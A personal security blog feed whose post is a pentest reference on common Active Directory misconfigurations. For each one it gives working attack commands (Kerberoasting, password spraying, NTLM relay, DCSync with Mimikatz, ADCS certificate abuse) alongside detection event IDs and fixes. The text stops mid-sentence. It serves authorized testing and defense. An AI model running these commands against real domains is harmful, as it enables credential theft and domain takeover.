<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>0xSebin - Personal Blog</title>
  
  <subtitle>Personal Blog</subtitle>
  <link href="http://example.com/atom.xml" rel="self"/>
  
  <link href="http://example.com/"/>
  <updated>2026-06-06T09:05:49.871Z</updated>
  <id>http://example.com/</id>
  
  <author>
    <name>John Doe</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>Common Active Directory Misconfigurations and Where to Find Them</title>
    <link href="http://example.com/2025/12/26/Active-Directory-PT1/"/>
    <id>http://example.com/2025/12/26/Active-Directory-PT1/</id>
    <published>2025-12-26T07:00:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><blockquote><p><em>“You don’t need a zero-day. You just need to look harder.”</em></p></blockquote><p>Every time I drop into an internal network during a pentest or a red team engagement, the story is always the same - the domain is a goldmine. No exotic exploits, no custom implants, just <strong>misconfigured AD</strong> doing all the heavy lifting.</p><p>This post is a practical, no-fluff reference for the most common Active Directory low-hanging fruit. I’ve seen every single one of these in real BFSI environments. If you’re prepping for an internal pentest - this is for you.</p><hr><h2 id="Setup-Recon-First"><a href="#Setup-Recon-First" class="headerlink" title="Setup: Recon First"></a>Setup: Recon First</h2><p>Before swinging any tool, get your bearings.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Enumerate domain info from Linux</span></span><br><span class="line">nxc smb &lt;DC-IP&gt; -u <span class="string">&#x27;&#x27;</span> -p <span class="string">&#x27;&#x27;</span>                        <span class="comment"># null session check</span></span><br><span class="line">nxc smb &lt;DC-IP&gt; -u <span class="string">&#x27;guest&#x27;</span> -p <span class="string">&#x27;&#x27;</span>                   <span class="comment"># guest account check</span></span><br><span class="line">enum4linux-ng -A &lt;DC-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># From a domain-joined Windows box</span></span><br><span class="line">net user /domain</span><br><span class="line">net group <span class="string">&quot;Domain Admins&quot;</span> /domain</span><br><span class="line">systeminfo | findstr /B /C:<span class="string">&quot;Domain&quot;</span></span><br></pre></td></tr></table></figure></div><hr><h2 id="1-Kerberoasting"><a href="#1-Kerberoasting" class="headerlink" title="1. Kerberoasting"></a>1. Kerberoasting</h2><p><strong>What it is:</strong> Request a TGS ticket for any service account that has an SPN set. The ticket is encrypted with the service account’s NTLM hash - crack it offline.</p><p><strong>How common:</strong> Extremely. Every environment with SQL servers, IIS services, or old Java apps has orphaned SPNs on user accounts with weak passwords.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Linux</span></span><br><span class="line">impacket-GetUserSPNs domain.local/user:password -dc-ip &lt;DC-IP&gt; -request</span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password --kerberoasting output.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># Windows (PowerView)</span></span><br><span class="line">Get-NetUser -SPN | <span class="keyword">select</span> samaccountname, serviceprincipalname</span><br><span class="line"></span><br><span class="line"><span class="comment"># Rubeus</span></span><br><span class="line">.\Rubeus.exe kerberoast /outfile:hashes.txt</span><br></pre></td></tr></table></figure></div><p><strong>Crack it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4769</code> - RC4 ticket requests for service accounts. Look for <code>Ticket Encryption Type: 0x17</code> (RC4) on AES-capable DCs.</p><p><strong>Fix:</strong> Managed Service Accounts (gMSA), 128-char random passwords, AES-only encryption.</p><hr><h2 id="2-AS-REP-Roasting"><a href="#2-AS-REP-Roasting" class="headerlink" title="2. AS-REP Roasting"></a>2. AS-REP Roasting</h2><p><strong>What it is:</strong> Users with <code>Do not require Kerberos preauthentication</code> enabled send their AS-REP encrypted with their password hash - no credentials needed to request it.</p><p><strong>How common:</strong> Less than Kerberoasting, but still shows up in ~30% of engagements. Usually set accidentally by sysadmins who don’t know what it does.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Linux (no creds needed!)</span></span><br><span class="line">impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip &lt;DC-IP&gt; -no-pass</span><br><span class="line"></span><br><span class="line"><span class="comment"># With valid creds</span></span><br><span class="line">impacket-GetNPUsers domain.local/user:password -dc-ip &lt;DC-IP&gt; -request</span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password --asreproast output.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-DomainUser -PreauthNotRequired -Properties distinguishedname</span><br><span class="line"></span><br><span class="line"><span class="comment"># Native AD (RSAT)</span></span><br><span class="line">Get-ADUser -Filter <span class="string">&#x27;useraccountcontrol -band 4194304&#x27;</span> -Properties useraccountcontrol</span><br></pre></td></tr></table></figure></div><p><strong>Crack it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4768</code> without prior <code>4771</code> (failed pre-auth). Unauthenticated AS-REQ from non-DC hosts is a red flag.</p><p><strong>Fix:</strong> Enable Kerberos pre-auth on all user accounts. No exceptions.</p><hr><h2 id="3-LLMNR-NBT-NS-Poisoning"><a href="#3-LLMNR-NBT-NS-Poisoning" class="headerlink" title="3. LLMNR &#x2F; NBT-NS Poisoning"></a>3. LLMNR &#x2F; NBT-NS Poisoning</h2><p><strong>What it is:</strong> Windows machines broadcast LLMNR&#x2F;NBT-NS queries when DNS fails. Respond to those broadcasts, collect NTLMv2 hashes. Classic.</p><p><strong>How common:</strong> Absurdly common. Still present in the majority of enterprise networks as of 2025 because disabling it requires GPO changes that admins forget about.</p><p><strong>Exploit it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Responder (the OG)</span></span><br><span class="line"><span class="built_in">sudo</span> responder -I eth0 -wrf</span><br><span class="line"></span><br><span class="line"><span class="comment"># Collected hashes appear in /usr/share/responder/logs/</span></span><br><span class="line"><span class="comment"># Crack with:</span></span><br><span class="line">hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure></div><p><strong>If the hash doesn’t crack, relay it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Step 1: Disable SMB and HTTP in Responder.conf</span></span><br><span class="line"><span class="built_in">sudo</span> responder -I eth0 -wd</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 2: Relay with ntlmrelayx</span></span><br><span class="line">impacket-ntlmrelayx -tf targets.txt -smb2support -i</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Unusual LLMNR&#x2F;mDNS traffic, Event ID <code>5156</code> for unexpected connections from non-DC IPs.</p><p><strong>Fix:</strong> Disable LLMNR via GPO (<code>Computer Config → Admin Templates → Network → DNS Client → Turn off multicast name resolution</code>). Disable NBT-NS via DHCP options or network adapter settings.</p><hr><h2 id="4-Password-Spraying"><a href="#4-Password-Spraying" class="headerlink" title="4. Password Spraying"></a>4. Password Spraying</h2><p><strong>What it is:</strong> Try one or a few common passwords against a large list of users. Avoids lockouts. Single most reliable way to get that first foothold.</p><p><strong>How common:</strong> The first thing I try on every engagement. Success rate is frighteningly high - especially in Indian enterprises running legacy AD with no lockout policy.</p><p><strong>Find the lockout policy first:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nxc smb &lt;DC-IP&gt; -u <span class="string">&#x27;&#x27;</span> -p <span class="string">&#x27;&#x27;</span> --pass-pol</span><br><span class="line"><span class="comment"># or</span></span><br><span class="line">Get-ADDefaultDomainPasswordPolicy</span><br></pre></td></tr></table></figure></div><p><strong>Spray:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># NetExec (modern standard)</span></span><br><span class="line">nxc smb &lt;DC-IP&gt; -u users.txt -p <span class="string">&#x27;Company@2026&#x27;</span> --continue-on-success | grep <span class="string">&#x27;[+]&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Kerbrute (quieter, Kerberos-based)</span></span><br><span class="line">kerbrute passwordspray -d domain.local --dc &lt;DC-IP&gt; users.txt <span class="string">&#x27;Company@2026&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Linux with impacket</span></span><br><span class="line"><span class="keyword">for</span> pass <span class="keyword">in</span> <span class="string">&#x27;Password1&#x27;</span> <span class="string">&#x27;Company@123&#x27;</span> <span class="string">&#x27;Welcome1&#x27;</span>; <span class="keyword">do</span></span><br><span class="line">  impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip &lt;DC-IP&gt;</span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure></div><p><strong>Good spray candidates:</strong> <code>Company@123</code>, <code>Welcome1</code>, <code>P@ssw0rd</code>, <code>Company@Month+Year</code>.</p><p>During several Active Directory penetration tests, I successfully compromised multiple user accounts by leveraging weak password patterns based on the company name, month, year, and common permutations of the organization’s name.</p><p><code>Don&#39;t spray all passwords together, use a single password and try on all users.</code></p><p><strong>Detection:</strong> A spike in Event ID <code>4625</code> (failed logon) or <code>4771</code> (Kerberos pre-authentication failure) originating from a single source across multiple accounts may indicate password spraying activity.</p><p><strong>Fix:</strong> Strong password policy, lockout after 5 attempts, MFA on VPN&#x2F;RDP access, Azure AD Password Protection for on-prem.</p><hr><h2 id="5-Password-in-Description-SYSVOL-Shares"><a href="#5-Password-in-Description-SYSVOL-Shares" class="headerlink" title="5. Password in Description &#x2F; SYSVOL &#x2F; Shares"></a>5. Password in Description &#x2F; SYSVOL &#x2F; Shares</h2><p><strong>What it is:</strong> Sysadmins leaving cleartext credentials in AD user description fields, SYSVOL (via old GPP), or on accessible file shares.</p><p><strong>How common:</strong> I personally never found passwords in description fields, but still worth to check.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Passwords in AD user description fields</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password -M get-desc-users</span><br><span class="line"></span><br><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-DomainUser | Where-Object &#123;<span class="variable">$_</span>.description -ne <span class="variable">$null</span>&#125; | <span class="keyword">select</span> samaccountname, description</span><br><span class="line"></span><br><span class="line"><span class="comment"># GPP passwords (cpassword in SYSVOL) - old but still found</span></span><br><span class="line">impacket-Get-GPPPassword domain.local/user:password@&lt;DC-IP&gt;</span><br><span class="line">Get-GPPPassword  <span class="comment"># PowerSploit module</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Snaffler - finds creds in shares automatically</span></span><br><span class="line">.\Snaffler.exe -s -o snaffler_out.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec spider shares</span></span><br><span class="line">nxc smb &lt;DC-IP&gt; -u user -p password --spider C$ --pattern <span class="string">&quot;password|passwd|cred|secret&quot;</span></span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Audit AD user attributes for sensitive keywords, DLP on file share access.</p><p><strong>Fix:</strong> Audit description fields quarterly. Microsoft patched GPP passwords in MS14-025, but SYSVOL copies still exist in old environments. Snaffler findings &#x3D; immediate triage.</p><hr><h2 id="6-Unconstrained-Delegation"><a href="#6-Unconstrained-Delegation" class="headerlink" title="6. Unconstrained Delegation"></a>6. Unconstrained Delegation</h2><p><strong>What it is:</strong> Computers&#x2F;services with unconstrained delegation store TGTs of <strong>every user that authenticates to them</strong>. If you compromise that box, you get everyone’s TGT - including Domain Admins.</p><p><strong>How common:</strong> Very common in older environments. Every IIS server, SQL server, or SharePoint box from 10 years ago likely has it.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-DomainComputer -Unconstrained | <span class="keyword">select</span> dnshostname</span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password --trusted-for-delegation</span><br><span class="line"></span><br><span class="line"><span class="comment"># BloodHound</span></span><br><span class="line"><span class="comment"># Query: MATCH (c:Computer &#123;unconstraineddelegation:true&#125;) RETURN c</span></span><br></pre></td></tr></table></figure></div><p><strong>Exploit (requires local admin on the target machine):</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Wait/coerce a DA to connect, then dump TGTs with Rubeus</span></span><br><span class="line">.\Rubeus.exe monitor /interval:5 /filteruser:DC$</span><br><span class="line"></span><br><span class="line"><span class="comment"># Force authentication from DC using PrinterBug / PetitPotam</span></span><br><span class="line">.\SpoolSample.exe &lt;DC-IP&gt; &lt;UNCONSTRAINED-BOX-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Then pass the TGT</span></span><br><span class="line">.\Rubeus.exe ptt /ticket:&lt;base64_ticket&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4768</code> TGT requests from unexpected service accounts, unusual machine account authentications.</p><p><strong>Fix:</strong> Move to Constrained or Resource-Based Constrained Delegation. Add sensitive accounts to <code>Protected Users</code> group.</p><hr><h2 id="7-Constrained-Delegation-Abuse"><a href="#7-Constrained-Delegation-Abuse" class="headerlink" title="7. Constrained Delegation Abuse"></a>7. Constrained Delegation Abuse</h2><p><strong>What it is:</strong> Accounts configured for constrained delegation can request service tickets on behalf of <strong>any user</strong> for the allowed services. If you control that account, you can impersonate Domain Admins.</p><p><strong>How common:</strong> Common. Typically found on service accounts for SQL, Exchange, or web application pools.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-DomainUser -TrustedToAuth | <span class="keyword">select</span> samaccountname, msds-allowedtodelegateto</span><br><span class="line">Get-DomainComputer -TrustedToAuth | <span class="keyword">select</span> dnshostname, msds-allowedtodelegateto</span><br><span class="line"></span><br><span class="line"><span class="comment"># BloodHound</span></span><br><span class="line"><span class="comment"># Query: MATCH (u)-[:AllowedToDelegate]-&gt;(c) RETURN u, c</span></span><br></pre></td></tr></table></figure></div><p><strong>Exploit:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># With account creds/hash that has delegation set</span></span><br><span class="line"><span class="comment"># Linux</span></span><br><span class="line">impacket-getST domain.local/svc_account -hashes :NTLM_HASH -spn cifs/dc.domain.local -impersonate Administrator -dc-ip &lt;DC-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Windows - Rubeus S4U attack</span></span><br><span class="line">.\Rubeus.exe s4u /user:svc_account /rc4:&lt;NTLM&gt; /impersonateuser:Administrator /msdsspn:cifs/dc.domain.local /ptt</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4769</code> with unusual impersonation, S4U2Proxy ticket requests from unexpected hosts.</p><p><strong>Fix:</strong> Limit constrained delegation to minimum required SPNs. Prefer RBCD. Mark sensitive accounts as “Account is sensitive and cannot be delegated.”</p><hr><h2 id="8-DCSync"><a href="#8-DCSync" class="headerlink" title="8. DCSync"></a>8. DCSync</h2><p><strong>What it is:</strong> Replicate the entire NTDS.dit from the DC using legitimate replication rights (<code>DS-Replication-Get-Changes-All</code>). Get every domain hash without touching LSASS.</p><p><strong>How common:</strong> This is the end-game, not a starting point. But the rights are misconfigured more often than you’d think - Exchange Server setups and some AD migration tools grant these by default.</p><p><strong>Find accounts with replication rights:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-ObjectAcl -DistinguishedName <span class="string">&quot;DC=domain,DC=local&quot;</span> -ResolveGUIDs | </span><br><span class="line">  Where-Object &#123;<span class="variable">$_</span>.ObjectAceType -match <span class="string">&quot;DS-Replication&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># BloodHound - look for DCSync edges</span></span><br><span class="line"><span class="comment"># Query: MATCH p=()-[:DCSync]-&gt;() RETURN p</span></span><br></pre></td></tr></table></figure></div><p><strong>Exploit:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Linux</span></span><br><span class="line">impacket-secretsdump domain.local/user:password@&lt;DC-IP&gt;</span><br><span class="line">impacket-secretsdump -hashes :NTLM_HASH domain.local/user@&lt;DC-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Windows - Mimikatz</span></span><br><span class="line">lsadump::dcsync /domain:domain.local /user:krbtgt</span><br><span class="line">lsadump::dcsync /domain:domain.local /all /csv</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4662</code> with property <code>&#123;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&#125;</code> from non-DC IPs. Massive spike &#x3D; DCSync.</p><p><strong>Fix:</strong> Audit ACLs on domain root object. Remove unauthorized accounts with replication rights. Alert on 4662 from non-DC machines.</p><hr><h2 id="9-ADCS-Abuse-ESC1-ESC8"><a href="#9-ADCS-Abuse-ESC1-ESC8" class="headerlink" title="9. ADCS Abuse (ESC1 &amp; ESC8)"></a>9. ADCS Abuse (ESC1 &amp; ESC8)</h2><p><strong>What it is:</strong> Active Directory Certificate Services is practically “privilege escalation as a service.” ESC1 lets a low-priv user request a cert as any user (including DA). ESC8 relays NTLM to the CA’s web enrollment endpoint.</p><p><strong>How common:</strong> If your domain runs ADCS, you almost certainly have at least one misconfiguration. I’ve hit ESC1 on literally every BFSI environment that had ADCS deployed.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Certipy - enumerate and find vulnerable templates</span></span><br><span class="line">certipy find -u user@domain.local -p <span class="string">&#x27;Password&#x27;</span> -dc-ip &lt;DC-IP&gt; -vulnerable -stdout</span><br><span class="line"></span><br><span class="line"><span class="comment"># BloodHound output</span></span><br><span class="line">certipy find -u user@domain.local -p <span class="string">&#x27;Password&#x27;</span> -dc-ip &lt;DC-IP&gt; -bloodhound</span><br></pre></td></tr></table></figure></div><p><strong>ESC1 - Request cert as DA:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">certipy req -u user@domain.local -p <span class="string">&#x27;Password&#x27;</span> \</span><br><span class="line">  -ca <span class="string">&#x27;CORP-CA&#x27;</span> \</span><br><span class="line">  -template VulnerableTemplate \</span><br><span class="line">  -upn administrator@domain.local \</span><br><span class="line">  -dc-ip &lt;DC-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Auth with the cert → get NT hash</span></span><br><span class="line">certipy auth -pfx administrator.pfx -dc-ip &lt;DC-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>ESC8 - NTLM Relay to CA Web Enrollment:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Setup relay</span></span><br><span class="line">certipy relay -ca &lt;CA-IP&gt; -template DomainController</span><br><span class="line"></span><br><span class="line"><span class="comment"># Coerce DC authentication (PetitPotam / PrinterBug)</span></span><br><span class="line">impacket-PetitPotam &lt;ATTACKER-IP&gt; &lt;DC-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Unusual certificate requests in CA logs, Event ID <code>4886</code> &#x2F; <code>4887</code>, certificates issued for admin accounts by non-admin users.</p><p><strong>Fix:</strong> Fixing ESC1 by modifying template settings takes minutes. Fixing ESC8 by enabling EPA and requiring HTTPS takes a few hours of IIS configuration. Run Certipy quarterly.</p><hr><h2 id="10-BloodHound-Attack-Paths-ACL-Abuse"><a href="#10-BloodHound-Attack-Paths-ACL-Abuse" class="headerlink" title="10. BloodHound Attack Paths (ACL Abuse)"></a>10. BloodHound Attack Paths (ACL Abuse)</h2><p><strong>What it is:</strong> Misconfigured ACLs give low-priv accounts GenericAll, GenericWrite, WriteDACL, or ForceChangePassword over privileged objects. Chain them together for a path to DA.</p><p><strong>How common:</strong> BloodHound is perfect for this - you can find out quickly if your user has indirect control of another object. Almost every domain has at least one interesting ACL chain.</p><p><strong>Collect &amp; analyze:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Linux collection</span></span><br><span class="line">bloodhound-python -u user -p password -d domain.local -dc &lt;DC-IP&gt; -c All --zip</span><br><span class="line"></span><br><span class="line"><span class="comment"># Windows collection</span></span><br><span class="line">.\SharpHound.exe -c All --zipfilename bh_data.zip</span><br><span class="line"></span><br><span class="line"><span class="comment"># Upload to BloodHound, then run:</span></span><br><span class="line"><span class="comment"># &quot;Shortest Path to Domain Admins&quot;</span></span><br><span class="line"><span class="comment"># &quot;Find Principals with DCSync Rights&quot;</span></span><br><span class="line"><span class="comment"># &quot;Find Computers with Unconstrained Delegation&quot;</span></span><br></pre></td></tr></table></figure></div><hr><h2 id="11-LAPS-Not-Deployed-Reused-Local-Admin-Passwords"><a href="#11-LAPS-Not-Deployed-Reused-Local-Admin-Passwords" class="headerlink" title="11. LAPS Not Deployed (Reused Local Admin Passwords)"></a>11. LAPS Not Deployed (Reused Local Admin Passwords)</h2><p><strong>What it is:</strong> If LAPS (Local Administrator Password Solution) isn’t deployed, every machine in the domain likely has the <strong>same local Administrator password</strong> set via GPO or imaging. Compromise one → compromise all.</p><p><strong>How common:</strong> Extremely. Especially in environments with 5+ year old AD setups. LAPS is free and Microsoft ships it natively since Server 2022, but adoption is still low.</p><p><strong>Check for LAPS deployment:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Check if LAPS attribute exists in AD schema</span></span><br><span class="line">Get-ADObject <span class="string">&quot;CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec - check which machines have/don&#x27;t have LAPS</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password --module laps</span><br><span class="line"></span><br><span class="line"><span class="comment"># Check if current user can READ LAPS passwords (misconfigured ACLs)</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u user -p password -M laps</span><br></pre></td></tr></table></figure></div><p><strong>If LAPS IS deployed but ACLs are wrong:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Find who can read LAPS passwords</span></span><br><span class="line">Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | </span><br><span class="line">  Where-Object &#123;<span class="variable">$_</span>.ObjectAceType -like <span class="string">&quot;ms-Mcs-AdmPwd&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># PowerView - read LAPS passwords if you have rights</span></span><br><span class="line">Get-DomainComputer -Properties ms-Mcs-AdmPwd, dnshostname | </span><br><span class="line">  Where-Object &#123;<span class="variable">$_</span>.<span class="string">&quot;ms-mcs-admpwd&quot;</span> -ne <span class="variable">$null</span>&#125;</span><br></pre></td></tr></table></figure></div><p><strong>If LAPS isn’t deployed, test reused local admin password:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Spray the local admin hash or password laterally</span></span><br><span class="line">nxc smb targets.txt -u Administrator -p <span class="string">&#x27;FoundPassword&#x27;</span> --local-auth</span><br><span class="line">nxc smb targets.txt -u Administrator -H &lt;NTLM_HASH&gt; --local-auth</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Lateral movement with the same local admin creds across multiple machines, Event ID <code>4624</code> logon type 3 from unexpected source IPs.</p><p><strong>Fix:</strong> Deploy LAPS or Windows LAPS (native since 2023). Restrict who can read the <code>ms-Mcs-AdmPwd</code> attribute via ACLs.</p><hr><h2 id="12-NTLM-Relay-SMB-Signing-Disabled"><a href="#12-NTLM-Relay-SMB-Signing-Disabled" class="headerlink" title="12. NTLM Relay (SMB Signing Disabled)"></a>12. NTLM Relay (SMB Signing Disabled)</h2><p><strong>What it is:</strong> If SMB signing isn’t enforced, you can relay captured NTLM authentication to other machines — no cracking needed. Captured hash from machine A → authenticate as that user on machine 